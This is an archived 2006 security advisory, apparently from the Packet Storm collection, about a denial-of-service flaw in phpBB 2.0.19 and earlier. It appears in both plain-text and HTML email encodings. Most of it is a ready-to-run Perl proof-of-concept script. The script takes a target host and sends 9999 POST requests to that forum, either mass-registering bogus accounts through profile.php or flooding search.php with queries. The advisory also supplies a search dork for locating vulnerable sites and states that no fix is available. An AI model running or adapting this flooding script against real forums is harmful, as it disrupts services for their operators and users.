HYSA-2006-001.txt

2006-01-26T00:00:00
ID PACKETSTORM:43399
Type packetstorm
Reporter h4cky0u
Modified 2006-01-26T00:00:00

Description

                                        
                                            `------=_Part_22785_23101671.1138200225311  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
------------------------------------------------------  
HYSA-2006-001 h4cky0u.org Advisory 010  
------------------------------------------------------  
Date - Wed Jan 25 2006  
  
  
TITLE:  
=3D=3D=3D=3D=3D=3D  
  
phpBB 2.0.19 search.php and profile.php DOS Vulnerability  
  
  
SEVERITY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
High  
  
  
SOFTWARE:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
phpBB 2.0.19 and prior  
  
  
INFO:  
=3D=3D=3D=3D=3D  
  
phpBB is a high powered, fully scalable, and highly customizable  
Open Source bulletin board package. phpBB has a user-friendly  
interface, simple and straightforward administration panel, and  
helpful FAQ. Based on the powerful PHP server language and your  
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,  
phpBB is the ideal free community solution for all web sites.  
  
Support Website : http://www.phpbb.com  
  
  
BUG DESCRIPTION:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
The bug was originally found by HaCkZaTaN of NeoSecurityteam. The  
original exploit code can be found at -  
  
http://h4cky0u.org/viewtopic.php?t=3D637  
  
This one affected only versions uptill phpBB 2.0.15. The exploit code  
has been recoded which affects the latest version too. The bug resides  
in the following two scripts-  
  
profile.php << By registering as many users as you can.  
search.php << By searching in a way that the db cannot understand.  
  
  
Proof Of Concept Code:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
#!/usr/bin/perl  
#######################################  
## Recoded by: mix2mix and Elioni of http://ahg-khf.org  
## And h4cky0u Security Forums (http://h4cky0u.org)  
## Name: phpBBDoSReloaded  
## Original Author: HaCkZaTaN of Neo Security Team  
## Tested on phpBB 2.0.19 and earlier versions  
## Ported to perl by g30rg3_x  
## Date: 25/01/06  
#######################################  
use IO::Socket;  
  
## Initialized X  
$x =3D 0;  
  
print q(  
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN  
Recoded by Albanian Hackers Group &  
h4cky0u Security Forums=09  
  
);  
print q(Host |without-> http://www.| );  
$host =3D <STDIN>;  
chop ($host);  
  
print q(Path |example-> /phpBB2/ or /| );  
$pth =3D <STDIN>;  
chop ($pth);  
  
print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If  
Visual Confirmation is enabled| );  
$type =3D <STDIN>;  
chop ($type);  
  
## Tipi p=EBr regjistrim  
if($type =3D=3D 1){  
  
## User Loop for 9999 loops (enough for Flood xDDDD)  
while($x !=3D 9999)  
{  
  
## Antari q=EB regjistrohet automatikisht=EB "X"  
$uname =3D "username=3DAHG__" . "$x";  
  
## Emaili q=EB regjistrohet ne baz=EBn "X"  
$umail =3D "&email=3DAHG__" . "$x";  
  
$postit =3D "$uname"."$umail"."%40ahg-crew.org&new_password=3D0123456&passw=  
ord_confirm=3D0123456&icq=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=  
=3D&occupation=3D&interests=3D&signature=3D&viewemail=3D0&hideonline=3D0&no=  
tifyreply=3D0&notifypm=3D1&popup_pm=3D1&attachsig=3D1&allowbbcode=3D1&allow=  
html=3D0&allowsmilies=3D1&language=3Denglish&style=3D2&timezone=3D0&datefor=  
mat=3DD+M+d%2C+Y+g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DS=  
ubmit";  
  
$lrg =3D length $postit;  
  
my $sock =3D new IO::Socket::INET (  
PeerAddr =3D> "$host",  
PeerPort =3D> "80",  
Proto =3D> "tcp",  
);  
die "\nNuk mundem te lidhemi me hostin sepse =EBsht dosirat ose nuk  
egziston: $!\n" unless $sock;  
  
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Foru=  
ms  
print $sock "POST $pth"."profile.php HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg,  
image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "Accept-Encoding: gzip, deflate\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;  
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Connection: Keep-Alive\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Content-Length: $lrg\n\n";  
print $sock "$postit\n";  
close($sock);  
  
## Print a "+" for every loop  
syswrite STDOUT, "+";  
  
$x++;  
}  
  
## Tipi 2-sh=EB p=EBr K=EBrkim(Flood)  
}  
elsif ($type =3D=3D 2){  
  
while($x !=3D 9999)  
{  
## Final Search String to Send  
$postit =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&=  
search_terms=3Dany&search_author=3D&search_forum=3D-1&search_time=3D0&searc=  
h_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&sort_dir=3DASC&show_results=  
=3Dposts&return_chars=3D200";  
  
## Posit Length  
$lrg =3D length $postit;  
  
## Connect Socket with Variables Provided By User  
my $sock =3D new IO::Socket::INET (  
PeerAddr =3D> "$host",  
PeerPort =3D> "80",  
Proto =3D> "tcp",  
);  
die "\nThe Socket Can't Connect To The Desired Host or the Host is  
MayBe DoSed: $!\n" unless $sock;  
  
## Sending Truth Socket The HTTP Commands For Send A BD Search Into  
phpBB Forums  
print $sock "POST $pth"."search.php?mode=3Dresults HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Accept:  
text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain=  
;q=3D0.8,image/png,*/*;q=3D0.5\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "Accept-Encoding: gzip, deflate\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;  
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Connection: Keep-Alive\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Content-Length: $lrg\n\n";  
print $sock "$postit\n";  
close($sock);  
  
## Print a "+" for every loop  
syswrite STDOUT, "+";  
  
## Increment X in One for every Loop  
$x++;  
}  
}else{  
## STF??? Qfar=EB keni Shtypur  
die "Mund=EBsia nuk Lejohet +_-???\n";  
}  
  
  
FIX:  
=3D=3D=3D=3D  
  
No fix available as of date.  
  
  
GOOGLEDORK:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
"Powered by phpBB"  
  
  
CREDITS:  
=3D=3D=3D=3D=3D=3D=3D=3D  
  
- This vulnerability was discovered and researched by HaCkZaTaN of  
NeoSecurityteam.  
  
  
- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest  
release of the script -  
  
Web : http://ahg-khf.org  
  
mail : webmaster at ahg-khf dot org  
  
  
- Co Researcher -  
  
h4cky0u of h4cky0u Security Forums.  
  
mail : h4cky0u at gmail dot com  
  
web : http://www.h4cky0u.org  
  
  
ORIGINAL ADVISORY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt  
  
--  
http://www.h4cky0u.org  
(In)Security at its best...  
  
------=_Part_22785_23101671.1138200225311  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<pre>------------------------------------------------------<br> HYSA-2=  
006-001 <a href=3D"http://h4cky0u.org">h4cky0u.org</a> Advisory 010<br>----=  
--------------------------------------------------<br>Date - Wed Jan 25 200=  
6  
<br><br><br>TITLE:<br>=3D=3D=3D=3D=3D=3D<br><br>phpBB 2.0.19 search.php and=  
profile.php DOS Vulnerability<br><br><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D<br><br>High<br><br><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D<b=  
r><br>phpBB 2.0.19 and prior<br><br><br>INFO:<br>  
=3D=3D=3D=3D=3D<br><br>phpBB is a high powered, fully scalable, and highly =  
customizable <br>Open Source bulletin board package. phpBB has a user-frien=  
dly <br>interface, simple and straightforward administration panel, and <br=  
>helpful FAQ. Based on the powerful PHP server language and your=20  
<br>choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, <b=  
r>phpBB is the ideal free community solution for all web sites.<br><br>Supp=  
ort Website : <a href=3D"http://www.phpbb.com">http://www.phpbb.com</a><br>  
<br><br>BUG DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D<br><br>The bug was originally found by HaCkZaTaN of NeoSecurityteam. Th=  
e original exploit code can be found at -<br><br><a href=3D"http://h4cky0u.=  
org/viewtopic.php?t=3D637">http://h4cky0u.org/viewtopic.php?t=3D637  
</a><br><br>This one affected only versions uptill phpBB 2.0.15. The exploi=  
t code has been recoded which affects the latest version too. The bug resid=  
es in the following two scripts-<br><br>profile.php << By registering=  
as many users as you can.=20  
<br>search.php << By searching in a way that the db cannot understan=  
d.<br><br><br>Proof Of Concept Code:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>#!/usr/bin/perl <br>##############=  
######################### <br>## Recoded by: mix2mix and Elioni of=20  
<a href=3D"http://ahg-khf.org">http://ahg-khf.org</a><br>## And h4cky0u S=  
ecurity Forums (<a href=3D"http://h4cky0u.org">http://h4cky0u.org</a>) <br>=  
## Name: phpBBDoSReloaded<br>## Original Author: HaCkZaTaN of Neo Secur=  
ity Team=20  
<br>## Tested on phpBB 2.0.19 and earlier versions<br>## Ported to perl=  
by g30rg3_x<br>## Date: 25/01/06<br>####################################=  
### <br>use IO::Socket; <br><br>## Initialized X <br>$x =3D 0; <br><br>prin=  
t q(  
<br> phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN<br> Recoded=  
by Albanian Hackers Group &<br> h4cky0u Security Forums=09<br><br>); =  
<br>print q(Host |without-> <a href=3D"http://www.|">http://www.|</a> );=  
=20  
<br>$host =3D <STDIN>; <br>chop ($host); <br><br>print q(Path |exampl=  
e-> /phpBB2/ or /| ); <br>$pth =3D <STDIN>; <br>chop ($pth); <br><=  
br>print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If V=  
isual Confirmation is enabled| );=20  
<br>$type =3D <STDIN>; <br>chop ($type); <br><br>## Tipi p=EBr regjis=  
trim <br>if($type =3D=3D 1){ <br><br>## User Loop for 9999 loops (enough fo=  
r Flood xDDDD) <br>while($x !=3D 9999) <br>{ <br><br>## Antari q=EB regjist=  
rohet automatikisht=EB "X"=20  
<br>$uname =3D "username=3DAHG__" . "$x"; <br><br>## Em=  
aili q=EB regjistrohet ne baz=EBn "X" <br>$umail =3D "&e=  
mail=3DAHG__" . "$x"; <br><br>$postit =3D "$uname"=  
."$umail"."%40ahg-  
crew.org&new_password=3D0123456&password_confirm=3D0123456&icq=  
=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=3D&am=  
p;occupation=3D&interests=3D&signature=3D&viewemail=3D0&hid=  
eonline=3D0&notifyreply=3D0&notifypm=3D1&popup_pm=3D1&attac=  
hsig=3D1&allowbbcode=3D1&allowhtml=3D0&allowsmilies=3D1&lan=  
guage=3Denglish&style=3D2&timezone=3D0&dateformat=3DD+M+d%2C+Y+=  
g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DSu=  
bmit  
"; <br><br>$lrg =3D length $postit; <br><br>my $sock =3D new IO::Socke=  
t::INET ( <br> PeerAddr =3D> "$host=  
", <br> PeerPort =3D> "80&quot=  
;, <br>  
Proto =3D> "tcp", <br> =  
); <br>die "\nNuk mundem te lidhemi me hostin=  
sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; <br><br>##=  
Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums=  
=20  
<br>print $sock "POST $pth"."profile.php HTTP/1.1\n"; <=  
br>print $sock "Host: $host\n"; <br>print $sock "Accept: ima=  
ge/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f=  
lash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/=  
msword, */*\n";=20  
<br>print $sock "Referer: $host\n"; <br>print $sock "Accept-=  
Language: en-us\n"; <br>print $sock "Content-Type: application/x-=  
www-form-urlencoded\n"; <br>print $sock "Accept-Encoding: gzip, d=  
eflate\n";=20  
<br>print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv=  
:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connect=  
ion: Keep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n&qu=  
ot;;=20  
<br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock &quot=  
;$postit\n"; <br>close($sock); <br><br>## Print a "+" for ev=  
ery loop <br>syswrite STDOUT, "+"; <br><br>$x++; <br>} <br><br>  
## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) <br>} <br>elsif ($type =3D=3D 2){ <br=  
><br>while($x !=3D 9999) <br>{ <br>## Final Search String to Send <br>$post=  
it =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&=  
amp;search_terms=3Dany&search_author=3D&search_forum=3D-1&searc=  
h_time=3D0&search_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&=  
amp;sort_dir=3DASC&show_results=3Dposts&return_chars=3D200";=  
=20  
<br><br>## Posit Length <br>$lrg =3D length $postit; <br><br>## Connect Soc=  
ket with Variables Provided By User <br>my $sock =3D new IO::Socket::INET (=  
<br> PeerAddr =3D> "$host", <=  
br>  
PeerPort =3D> "80", <br> =  
Proto =3D> "tcp", <br> =  
); <br>die "\nThe Socket Can't Connect To The Desi=  
red Host or the Host is MayBe DoSed: $!\n" unless $sock;=20  
<br><br>## Sending Truth Socket The HTTP Commands For Send A BD Search Into=  
phpBB Forums <br>print $sock "POST $pth"."search.php?mode=  
=3Dresults HTTP/1.1\n"; <br>print $sock "Host: $host\n"; <br=  
>  
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,te=  
xt/html;q=3D0.9,text/plain;q=3D0.8,image/png,*/*;q=3D0.5\n"; <br>print=  
$sock "Referer: $host\n"; <br>print $sock "Accept-Language:=  
en-us\n";=20  
<br>print $sock "Content-Type: application/x-www-form-urlencoded\n&quo=  
t;; <br>print $sock "Accept-Encoding: gzip, deflate\n"; <br>print=  
$sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8  
) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connection: K=  
eep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n"; <=  
br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock "=  
$postit\n";=20  
<br>close($sock); <br><br>## Print a "+" for every loop <br>syswr=  
ite STDOUT, "+"; <br><br>## Increment X in One for every Loop <br=  
>$x++; <br>} <br>}else{ <br>## STF??? Qfar=EB keni Shtypur <br> die &quot=  
;Mund=EBsia nuk Lejohet +_-???\n";=20  
<br>}<br><br><br>FIX:<br>=3D=3D=3D=3D<br><br>No fix available as of date.<b=  
r><br><br>GOOGLEDORK:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>"Pow=  
ered by phpBB" <br><br><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D<br><br=  
>- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecu=  
rityteam.  
<br><br><br>- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the=  
latest release of the script -<br><br>Web : <a href=3D"http://ahg-khf.org"=  
>http://ahg-khf.org</a><br><br>mail : webmaster at ahg-khf dot org<br><br>  
<br>- Co Researcher -<br><br>h4cky0u of h4cky0u Security Forums.<br><br>mai=  
l : h4cky0u at gmail dot com<br><br>web : <a href=3D"http://www.h4cky0u.org=  
">http://www.h4cky0u.org</a><br><br><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
<br><br><a href=3D"http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.tx=  
t">http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt</a><br><br></p=  
re>  
-- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>(In=  
)Security at its best...  
  
------=_Part_22785_23101671.1138200225311--  
`